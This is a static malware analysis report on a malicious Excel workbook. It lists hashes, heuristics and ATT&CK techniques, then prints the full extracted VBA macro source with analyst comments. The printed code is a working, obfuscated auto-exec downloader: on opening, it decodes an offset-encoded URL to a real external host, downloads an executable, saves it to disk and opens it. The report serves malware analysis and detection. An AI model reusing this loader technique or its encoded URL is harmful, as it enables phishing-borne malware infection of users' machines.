Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1730557733d0f802…

MALICIOUS

Office (OLE)

69.0 KB Created: 2015-07-30 05:24:02 Authoring application: Microsoft Excel First seen: 2016-04-16
MD5: 50c4e000df7639c476cd72f2ba4b1983 SHA-1: 614ff7735499354afb3a5b43e6e9398b0f1067d5 SHA-256: 1730557733d0f802a2a1e8d3b91535a51db1170a966327969075304d4876a017
248 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Excel workbook (module names ЭтаКнига/Лист1–3 suggest a Russian-locale Excel) whose Workbook_Open handler calls CenterByMan in Module1, starting a download-and-execute chain: CenterByMan → CheckBins → crentips → KeepBlyading → product → OnasOn → SaveMaps. The COM ProgIDs and member names are not in the code module: CenterByMan reads UserForm1.Label1.Caption at runtime, splits it on "/" into the `hubabuba` string table, and the chain consumes those fields through CreateObject and CallByName (VbGet/VbLet/VbMethod), which is why the macro source contains no literal object names. The download URL is recoverable from the source, however: the colon-separated numbers in CheckBins are ASCII codes offset by +1000, decoded in crentips via Chr(CInt(x) - 1000), and yield hxxp://home.copyclub[.]ru/wp-admin/maint/76ghby6f45.exe (defanged; the /wp-admin/ path is consistent with a compromised WordPress host). The observed call shape — object 1: .Open(verb, url, False), .Send, property-get; object 2: property-let 1, .Open, method(data), method(path, 2); an .Environment(...) lookup to build the drop path; object 3: .Open(path) — matches the common XMLHTTP → ADODB.Stream → WScript.Shell/Shell.Application loader pattern, but the actual ProgIDs should be confirmed by extracting the UserForm1 label caption from the sample. The bulk of the remaining code (dictionary/range helpers referencing undefined `pDict`/`Dicts`, branches skipped by unconditional GoTo) is filler that never executes. No specific family is attributed here; the decoded URL, the download-write-open behaviour (also T1105 Ingress Tool Transfer, T1027 Obfuscated Files or Information) and the sample hashes are the actionable indicators.

Heuristics 7

  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    ErrExit:
    Set pubbyRodger_1 = CreateObject(hubabuba(0))
    CheckBins
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    ErrExit:
    Set pubbyRodger_1 = CreateObject(hubabuba(0))
    CheckBins
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Public Sub SaveMaps()
    rbp = CallByName(pubbyRodger_1, hubabuba(10), VbGet)
      Dim objStor As Variant
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Public Sub Workbook_Open()
    Call CenterByMan
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14484 bytes
SHA-256: 3ccbfd8ea4b148b18ee5e3527f5973881e19010b9641cb9a0b500b046a43aac4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Auto-exec entry point: Excel runs this when the workbook is opened. It only
' hands off to CenterByMan (Module1), the first stage of the download-and-run chain.
Public Sub Workbook_Open()
Call CenterByMan
End Sub

Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{8CE1DD38-2B07-4F3D-AC62-F4321764A6DF}{44BEBCCC-45F8-4596-9A46-D713FAEB2B88}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module1"
' Module-level state shared by the loader chain
' (CenterByMan -> CheckBins -> crentips -> KeepBlyading -> product -> OnasOn -> SaveMaps).
' The names carry no meaning; the roles below are taken from how each variable is used.
' Created from hubabuba(0); receives .Open(verb, url, False), .Send and a property-get
' (the response) -- XMLHTTP-like usage, but the ProgID is not visible in this extraction.
Public pubbyRodger_1 As Object
' Created from hubabuba(1); property-let 1, .Open, method(data), method(path, 2)
' -- ADODB.Stream-like usage, ProgID not visible here.
Public pubbyRodger_2 As Object
' Result of husbanD.Environment(hubabuba(4)); indexed by name in KeepBlyading.
Public pubbyRodger_3 As Object

' Colon-separated fields of the +1000-offset URL (set in CheckBins, decoded in crentips).
Public pubbyRodger_7() As String
' Environment-variable value read in KeepBlyading (presumably a directory such as a
' temp path; the variable name, hubabuba(6), is not visible here).
Public pubbyRodger_4 As String
' Full drop path: pubbyRodger_4 + hubabuba(12), built in product(), written and opened in SaveMaps.
Public pubbyRodger_5 As String
' Created from hubabuba(2); its only use is .Open(pubbyRodger_5) in SaveMaps (the execution sink).
Public pubbyRodger_6 As Object
' String table: UserForm1.Label1.Caption split on "/" (CenterByMan). Holds the COM
' ProgIDs and member names; indices 0-7 and 9-12 are referenced by the chain.
Public hubabuba() As String
' The three declarations below are never referenced in the extracted source.
Public MapsInitialized As Boolean
Public mDBname As String
Public MapInit As Boolean


' ________________________________________Util Functions End____________________________________________

' Sum of a range.
' Filler: not reached from the Workbook_Open chain in this extraction; appears to
' be benign spreadsheet-utility code. For each row startRow..endRow it sums the
' numeric values found in the columns listed in arrCol (unqualified Cells, i.e.
' the active sheet) and returns a 1-based (rows x 1) array of those sums.
Public Function rngCol(ByVal startRow As Integer, ByVal endRow As Integer, ByVal arrCol As Variant)
    Dim res()
    ReDim res(1 To endRow - startRow + 1, 1 To 1)
    
    Dim i As Integer
    Dim j As Integer
    
    Dim sum As Double
    
    
    For i = startRow To endRow
        For j = 0 To UBound(arrCol)
            ' Non-numeric cells are skipped rather than raising a type error.
            If IsNumeric(Cells(i, arrCol(j)).Value) Then
             sum = sum + Cells(i, arrCol(j)).Value
            End If
        Next j
        
        res(i - startRow + 1, 1) = sum
        sum = 0
    Next i
    
    rngCol = res
    
End Function

' Filler: not reached from the Workbook_Open chain in this extraction.
' Returns a 1-based (rows x 1) array whose every element is itself a 0-based
' array holding that row's raw values in the columns listed in arrCol.
Public Function rngArr(ByVal startRow As Integer, ByVal endRow As Integer, ByVal arrCol As Variant)
    Dim res()
    ReDim res(1 To endRow - startRow + 1, 1 To 1)
    
    Dim i As Integer
    Dim j As Integer
    
    Dim sum()
    ReDim sum(0 To UBound(arrCol))
    
    
    For i = startRow To endRow
        For j = 0 To UBound(arrCol)
            sum(j) = Cells(i, arrCol(j)).Value
        Next j
        
        res(i - startRow + 1, 1) = sum
        ' Fresh inner array per row (ReDim without Preserve clears it).
        ReDim sum(0 To UBound(arrCol))
    Next i
    
    rngArr = res
    
End Function

' Filler: not reached from the Workbook_Open chain in this extraction.
' Returns a 0-based array of the integers start..ending (inclusive).
Public Function rng(ByVal start As Integer, ByVal ending As Integer)
    Dim res()
    ReDim res(0 To ending - start)
    
    Dim i As Integer
    For i = start To ending
        res(i - start) = i
    Next i
    
    rng = res
End Function


' First stage of the loader, called from Workbook_Open.
' Builds the string table `hubabuba` by splitting UserForm1.Label1.Caption on "/".
' Every COM ProgID and member name used by the chain comes from that form control,
' not from this module, so they are absent from the extracted source (indices up
' to 12 are referenced, so the caption must hold at least 13 fields).
' NOTE(review): to confirm which COM objects are instantiated, recover the Label1
' caption from the sample's UserForm1 storage.
Public Sub CenterByMan()
  Dim Col As String
  Dim obj As String
  hubabuba = Split(UserForm1.Label1.Caption, "/")
  GoTo ErrExit

ErrExit:
' First object: used later as the HTTP client (.Open in crentips, .Send in KeepBlyading,
' property-get in SaveMaps). Then continue to stage two.
Set pubbyRodger_1 = CreateObject(hubabuba(0))
CheckBins
  Exit Sub
husbanDip:
' Unreachable: there is no On Error statement routing here and `AD` is undeclared.
' Looks like leftover/decoy error-handler code.
   AD.DisplayError Err.Number, "modMaps", "CenterByMan", Err.Description
   Resume ErrExit
End Sub


' ______________________________ Print______________________________________________

' Filler: not reached from the Workbook_Open chain in this extraction.
' Debug.Prints every key of Me.dict with its value, rendering array values via
' a_toString; the "is array" check only inspects the first key.
' NOTE(review): `Me` is only valid in class/form modules -- in a standard module
' (Module1) this should be a compile error ("Invalid use of Me keyword"). Worth
' confirming whether Module1 compiles as extracted or whether the executed p-code
' differs from this source (cf. the OLE_VBA_PCODE_AUTOEXEC_EXEC finding).
Public Function p()
    
    ' check if the val is array
    Dim is_a As Boolean
    Dim k
    
    For Each k In Me.dict.Keys
        is_a = IsArray(Me.dict(k))
        Exit For
    Next k
    
    If is_a Then
         For Each k In Me.dict.Keys
            Debug.Print k & "  " & a_toString(Me.Item(k))
        Next k
    Else
        For Each k In Me.dict.Keys
            Debug.Print k & "  " & Me.Item(k)
        Next k
    End If
    
    

End Function

' Filler: only referenced by p() in this extraction.
' Renders an array as "[ a, b, c ]": each element is prefixed with a space, has
' any "," replaced by ".", and the trailing ", " is trimmed before appending " ]".
' As written, an empty array makes Len(res) - 2 negative and Left() raises
' "Invalid procedure call" (run-time error 5).
Public Function a_toString(ByVal arr As Variant) As String
    Dim res As String
    Dim i
    res = "["
    
    For Each i In arr
        res = res & Replace(" " & i, ",", ".") & ", "
    Next i
    
    res = Left(res, Len(res) - 2)
    
    
    a_toString = res & " ]"

End Function


' Filler: not reached from the Workbook_Open chain in this extraction.
' Debug.Prints each key of Me.dict. Same `Me`-in-standard-module concern as p().
Public Function pk()

    Dim k
    For Each k In Me.dict.Keys
        Debug.Print k
    Next k

End Function

' Final stage (called from OnasOn): moves the HTTP response into the stream
' object, writes it to the path assembled in product(), then opens that path.
Public Sub SaveMaps()
' Property-get hubabuba(10) on the HTTP object -- presumably the response body.
' `rbp` is undeclared (implicit Variant).
rbp = CallByName(pubbyRodger_1, hubabuba(10), VbGet)
  Dim objStor As Variant
' Method hubabuba(9) with the response as argument: write the payload into the stream.
  CallByName pubbyRodger_2, hubabuba(9), VbMethod, rbp
  
' Method hubabuba(11) with (path, 2): save the stream to the drop path. The literal 2
' matches ADODB.Stream.SaveToFile's adSaveCreateOverWrite -- consistent with, not proof of, ADODB.Stream.
  CallByName pubbyRodger_2, hubabuba(11), VbMethod, pubbyRodger_5, 2
GoTo husbanDip
 
ErrExit:
  Exit Sub
husbanDip:
' Execution sink: .Open on the third object with the dropped file's path.
pubbyRodger_6.Open (pubbyRodger_5)
End Sub





Attribute VB_Name = "Module4"

' Filler: not reached from the Workbook_Open chain in this extraction, and relies
' on `pDict`, which no extracted module defines.
' Builds a JSON-like string {"name":k,"children":[{"name":key,"size":value},...]}
' from pDict, stripping double quotes from keys and swapping "," for "." in values;
' Chr(13) separators are inserted between entries.
Public Function toJSON(Optional ByVal k As String = "root") As String
    Dim res As String
    res = "{""name"":""" & k & """," & Chr(13)
    res = res & """children"":[" & Chr(13)
    
    Dim ky
    For Each ky In pDict.Keys
        res = res & "{""name"":""" & Replace(CStr(ky), """", "") & """, " & """size"": " & Replace(CStr(pDict(ky)), ",", ".") & "}," & Chr(13)
    Next ky
    
    ' Drops the trailing "," & Chr(13) before closing the array and object.
    toJSON = Left(res, Len(res) - 2) & Chr(13) & "]}"
    
    
End Function




Attribute VB_Name = "Module3"


' Filler: not reached from the Workbook_Open chain in this extraction; relies on
' `pDict` and the class `Dicts`, neither defined in the extracted modules.
' Applies productArr to every entry of pDict: against a scalar operand2 when it is
' numeric, otherwise against the matching key of operand2.dict (missing keys skipped).
Public Function productRng(ByVal operand2 As Variant, ByVal operation As String) As Variant
    Dim k
    Dim i
   
    Dim res As Variant
    Set res = New Dicts
    Call res.ini
    
    
    If IsNumeric(operand2) Then
        ' if the second operand is numeric

        For Each k In pDict.Keys
            res.dict(k) = productArr(pDict(k), operation, operand2)
        Next k
    Else
    
        For Each k In pDict.Keys
          
            If operand2.dict.Exists(k) Then
                res.dict(k) = productArr(pDict(k), operation, operand2.dict(k))
            End If

        Next k
    End If
   
    Set productRng = res

End Function


' Filler: only referenced by productRng in this extraction.
' Element-wise evaluation: for each index, builds the text "<arr1(i)><operation><arr2>"
' (or "<arr2(i)>" when arr2 is an array), replaces "," with "." and hands it to
' Application.Evaluate. Evaluating caller-supplied text this way is an eval sink,
' but here both operands are spreadsheet values, not untrusted input.
Public Function productArr(ByVal arr1 As Variant, ByVal operation As String, ByVal arr2 As Variant) As Variant
    Dim res
    Dim i
    ReDim res(LBound(arr1) To UBound(arr1))
    
    If IsNumeric(arr2) Then
        For i = LBound(arr1) To UBound(arr1)
            res(i) = Application.Evaluate(Replace(arr1(i) & operation & arr2, ",", "."))
        Next i
    Else
        For i = LBound(arr1) To UBound(arr1)
            res(i) = Application.Evaluate(Replace(arr1(i) & operation & arr2(i), ",", "."))
        Next i
    End If
    
    productArr = res

End Function


' Stage three (called from CheckBins): decodes the download URL and opens the HTTP request.
' Each field of pubbyRodger_7 is an ASCII code offset by +1000; Chr(CInt(x) - 1000)
' rebuilds the plaintext. With the literal in CheckBins this yields
' hxxp://home.copyclub[.]ru/wp-admin/maint/76ghby6f45.exe (defanged).
' nY is never used and the function never assigns its String return value.
Public Function crentips(nY As Integer) As String
    
    Dim pubbyRodger_8 As Integer
  Dim pubbyRodger3_1 As String
  pubbyRodger3_1 = ""
   GoTo s2
    
s2:
' Decoder loop: numeric fields -> URL string.
      For pubbyRodger_8 = LBound(pubbyRodger_7) To UBound(pubbyRodger_7)
    pubbyRodger3_1 = pubbyRodger3_1 & Chr(CInt(pubbyRodger_7(pubbyRodger_8)) - 1000)
  Next pubbyRodger_8
GoTo SIDR4
    
SIDR4:
' .Open(verb, url, async=False). hubabuba(5) is presumably the HTTP method
' (e.g. "GET") -- it lives in the form caption, not in this source. The request
' is sent in KeepBlyading.
pubbyRodger_1.Open hubabuba(5), pubbyRodger3_1, False
KeepBlyading
        
End Function



' Filler: not reached from the Workbook_Open chain in this extraction; relies on
' the class `Dicts`, which is not defined in the extracted modules.
' Copies a nested Dicts structure: recurses l-1 levels deep, copying leaf values
' at the last level.
Public Function clone__(ByVal d As Variant, ByVal l As Integer) As Variant
    Dim res As New Dicts
    Dim k
    
    Call res.ini
    
    If l > 1 Then
         For Each k In d.dict.Keys
            Set res.dict(k) = clone__(d.dict(k), l - 1)
         Next k
    Else
        For Each k In d.dict.Keys
            res.dict(k) = d.dict(k)
        Next k
    End If
    
    Set clone__ = res

End Function


' Stage two (called from CenterByMan): stores the encoded URL, creates the
' remaining COM objects and grabs an environment-variable collection, then
' continues to crentips. The local Dims and the ErrExit label are never used.
Public Sub CheckBins()

' Encoded URL: each colon-separated number is an ASCII code + 1000; decoded in
' crentips. Plaintext: hxxp://home.copyclub[.]ru/wp-admin/maint/76ghby6f45.exe (defanged).
pubbyRodger_7 = Split("1104:1116:1116:1112:1058:1047:1047:1104:1111:1109:1101:1046:1099:1111:1112:1121:1099:1108:1117:1098:1046:1114:1117:1047:1119:1112:1045:1097:1100:1109:1105:1110:1047:1109:1097:1105:1110:1116:1047:1055:1054:1103:1104:1098:1121:1054:1102:1052:1053:1046:1101:1120:1101", _
":")

  Dim LP As Long
  Dim BinID As Long
  Dim objStorages As String
  Dim objStorage As Variant
  Dim MapID As Long
' Second object: receives the response and writes the file (OnasOn / SaveMaps).
  Set pubbyRodger_2 = CreateObject(hubabuba(1))
   GoTo husbanDip
  
ErrExit:
  Exit Sub
husbanDip:
' Third object: its only use is .Open(path) in SaveMaps -- the execution sink.
Set pubbyRodger_6 = CreateObject(hubabuba(2))
' Fourth object exposes .Environment(name). This is consistent with the WScript.Shell
' reference the scanner flagged (SC_STR_WSCRIPT); `husbanD` is undeclared (implicit Variant).
Set husbanD = CreateObject(hubabuba(3))
Set pubbyRodger_3 = husbanD.Environment(hubabuba(4))
' The argument 3 is ignored by crentips.
crentips 3
End Sub

' Filler: not reached from the Workbook_Open chain in this extraction; relies on
' `pDict` and the class `Dicts`, neither defined in the extracted modules.
' Returns a new Dicts holding only the pDict entries whose key matches reg.test(k)
' (reg is presumably a VBScript RegExp; only its .test method is used).
Public Function filterInklude(ByVal reg As Object) As Variant
    
    Dim k
    
    Dim res As Variant
    Set res = New Dicts
    Call res.ini
    
    For Each k In pDict.Keys
      If reg.test(k) Then
        res.dict(k) = pDict(k)
      End If
    Next k
    
    Set filterInklude = res
    
End Function

''''''''''''''''''''
'set all the elements to a constant
'default to be 1
''''''''''''''''''''

' Filler: not reached from the Workbook_Open chain in this extraction; relies on
' `pDict` and the class `Dicts`, neither defined in the extracted modules.
' Returns a new Dicts with every key of pDict mapped to `constant` (default 1).
Public Function constDict(Optional ByVal constant As Variant) As Variant
    Dim k
    
    Dim res As Variant
    Set res = New Dicts
    Call res.ini
    
    If IsMissing(constant) Then
        constant = 1
    End If
    
    For Each k In pDict.Keys
        res.dict(k) = constant
    Next k
    
    Set constDict = res

End Function







Attribute VB_Name = "Module2"


'''''''''''''''''''
'@param operand2 can be either number or Dicts
'       operation supports only the string
'''''''''''''''''''
' NOTE(review): the header above describes the filler body, not what executes.
' Stage four (called from KeepBlyading): builds the drop path
'   pubbyRodger_5 = pubbyRodger_4 + hubabuba(12)
' (both are Strings, so `+` concatenates) and returns. Only the lines on the
' LABZ4 path run; everything after `Exit Function` is unreachable and references
' undefined names (operand2, operation, pDict, IsNumericOperation). The split
' identifiers such as `Appli.cation.Evaluate` are never evaluated and presumably
' exist to defeat naive substring scans for "Application.Evaluate".
' Declared As Variant but never assigns a return value.
Public Function product() As Variant
    Dim k
    Dim isNum As Boolean
    isNum = True
    
' Start from the environment value read in KeepBlyading.
pubbyRodger_5 = pubbyRodger_4
GoTo LABZ4
    Dim res As Variant
    Call res.ini
    
    If Not IsMissing(IsNumericOperation) Then
        If Not IsNumericOperation Then
            isNum = False
        End If
    Else
        isNum = True
    End If

   
LABZ4:
' Append the file-name component (hubabuba(12), from the form caption).
pubbyRodger_5 = pubbyRodger_5 + hubabuba(12)
Exit Function

    If IsNumeric(operand2) Then
        ' if the second operand is numeric
        
         
        For Each k In pDict.Keys
            If Not isNum Then
               
                res.dict(k) = App.lication.Evaluate(Appli.cation.Works.heetFunction.Substitute(pDict(k) & operation & operand2, ",", "."))
            Else
                res.dict(k) = Appli.cation.Evaluate(pDict(k) & operation & operand2)
            End If
        Next k
    Else
    
        For Each k In pDict.Keys
            If Not isNum Then
               If operand2.dict.Exists(k) Then
                    res.dict(k) = Appli.cation.Evaluate(Appli.cation.WorksheetFunction.Substitute(pDict(k) & operation & operand2.dict(k), ",", "."))
               End If
            Else
                If operand2.dict.Exists(k) Then
                    res.dict(k) = Applica.tion.Evaluate(pDict(k) & operation & operand2.dict(k))
                End If
            End If
        Next k
    End If
   
    Set product = res
    
End Function

' Stage five (called from KeepBlyading): prepares the stream object and moves on
' to SaveMaps. The ErrExit label is dead.
Public Sub OnasOn()

' Property-let hubabuba(7) = 1, then .Open. Setting a property to 1 before Open is
' consistent with ADODB.Stream .Type = adTypeBinary (1); the ProgID is not in this source.
   CallByName pubbyRodger_2, hubabuba(7), VbLet, 1
 pubbyRodger_2.Open
GoTo husbanDip
  
ErrExit:
  Exit Sub
husbanDip:
SaveMaps
End Sub

' Filler: not reached from the Workbook_Open chain in this extraction; relies on
' `pDict`, which no extracted module defines.
' Folds all arrays stored in pDict element-wise into one array: sums when sign is
' "+", multiplies otherwise. Bounds are taken from the first entry.
Public Function reduceRngVertical(ByVal sign As String) As Variant
    Dim k
    Dim i
    Dim tmpCnt As Integer
    tmpCnt = 1
    Dim arr()
    
    Dim u As Integer
    Dim l As Integer

    For Each k In pDict.Keys
        ' First iteration: size the accumulator and seed it with the identity (0 or 1).
        If tmpCnt = 1 Then
            u = UBound(pDict(k))
            l = LBound(pDict(k))
            ReDim arr(l To u)
            tmpCnt = 2
            
            If sign = "+" Then
                For i = l To u
                    arr(i) = 0
                Next i
            Else
                For i = l To u
                    arr(i) = 1
                Next i
            End If
            
        End If
        
        If sign = "+" Then
            For i = l To u
                arr(i) = arr(i) + pDict(k)(i)
            Next i
        Else
            For i = l To u
                arr(i) = arr(i) * pDict(k)(i)
            Next i
        End If

    Next k
   
    
    reduceRngVertical = arr


End Function

' Filler: not reached from the Workbook_Open chain in this extraction.
' Folds arr: sum when sign is "" or "+", product when sign is "*"; any other
' sign leaves res unassigned (Empty).
Public Function reduceArray(ByVal arr, ByVal sign As String) As Variant
    Dim res As Variant
    Dim k
    
    
    If sign = "" Or sign = "+" Then
        res = 0
        For Each k In arr
            res = res + k
        Next k
    ElseIf sign = "*" Then
        res = 1
        For Each k In arr
            res = res * k
        Next k
    End If
    
    reduceArray = res
    
End Function

' Filler: not reached from the Workbook_Open chain in this extraction; relies on
' `pDict` and the class `Dicts`, neither defined in the extracted modules.
' Keeps the keys of pDict for which Application.Evaluate(operation with
' `placeholder` replaced by the entry's value) is True; the stored value is the
' key itself. When hasThousandSep is True, "," in the value is replaced by "."
' before substitution. Another Application.Evaluate (eval) sink on built text.
Public Function filterVal(ByVal operation As String, Optional ByVal placeholder As String = "{*}", Optional ByVal hasThousandSep As Boolean = True) As Variant
    Dim k
    Dim tmp As String
    
    Dim res As Variant
    Set res = New Dicts
    Call res.ini

    If hasThousandSep Then
        For Each k In pDict.Keys
            tmp = Replace(pDict(k) & "", ",", ".")
            
            If Application.Evaluate(Replace(operation, placeholder, tmp)) Then
                res.dict(k) = k
            End If
        Next k
    Else
        For Each k In pDict.Keys
            If Application.Evaluate(Replace(operation, placeholder, pDict(k) & "")) Then
                res.dict(k) = k
            End If
        Next k
    End If

    Set filterVal = res
    
End Function

' Stage three-and-a-half (called from crentips): sends the HTTP request opened in
' crentips, reads one environment variable (name hubabuba(6), not visible here)
' into pubbyRodger_4, then continues to product and OnasOn.
' Everything between the first GoTo and label SIDR4 never executes: it is leftover
' dictionary-merge code referencing names (keepOriginalVal, pDict, dict2, Add)
' that no extracted module defines.
Public Sub KeepBlyading()

' Fire the request prepared by crentips (.Open with async=False, so this blocks).
      pubbyRodger_1.Send
GoTo SIDR4
    
 If IsMissing(keepOriginalVal) Then
        keepOriginalVal = True
    End If
    
    Dim k
    
    Dim res As Variant
    
    res.dict = pDict
    
    For Each k In dict2.dict.Keys
        If Not pDict.Exists(k) Then
            res.dict(k) = dict2.dict(k)
        ElseIf Not keepOriginalVal Then
            res.dict(k) = dict2.dict(k)
        End If
    Next k
    
    Set Add = res
SIDR4:
' Environment lookup on the .Environment collection obtained in CheckBins.
      pubbyRodger_4 = pubbyRodger_3(hubabuba(6))
GoTo SIDR1

SIDR1:
product
OnasOn
End Sub

' Filler: not reached from the Workbook_Open chain in this extraction; relies on
' `pDict` and the class `Dicts`, neither defined in the extracted modules.
' Inverse of filterInklude: returns a new Dicts holding only the pDict entries
' whose key does NOT match reg.test(k).
Public Function filterExklude(ByVal reg As Object) As Variant
    
    Dim k
    
    Dim res As Variant
    Set res = New Dicts
    Call res.ini
    
    For Each k In pDict.Keys
      If Not reg.test(k) Then
        res.dict(k) = pDict(k)
      End If
    Next k
    
    Set filterExklude = res
    
End Function